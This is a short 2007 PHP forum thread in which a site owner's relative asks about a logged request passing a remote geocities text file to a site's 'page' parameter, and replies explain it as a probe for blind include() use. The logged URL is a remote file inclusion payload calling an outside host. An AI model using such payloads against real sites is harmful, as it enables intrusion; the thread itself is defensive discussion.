Page 1 of 1

Attempt to spam?

Posted: Mon Sep 24, 2007 12:55 am
by ssand
Was looking through my brother-in-laws stat counter on his site and noticed a this in the log.

(http://www.his-site.com)/index.php?page=http://geocities.com/intermentur_b/send.txt

I presume they were attempting to run the page through my brother-in-laws site and spam under his domain and IP? It doesn't show anything on his site when called. Is this due to a built-in security measure of PHP or of the code on his site (my brother-in-laws site).

Thanks.

-

Posted: Mon Sep 24, 2007 7:49 am
by superdezign
That wouldn't cause spam, and doesn't have anything to do with a built-in security measure. His code likely is at least semi-secure and knows what pages it accepts as valid.

Posted: Mon Sep 24, 2007 10:38 am
by feyd
The attempt is to see if the page uses include() to blindly load the reference.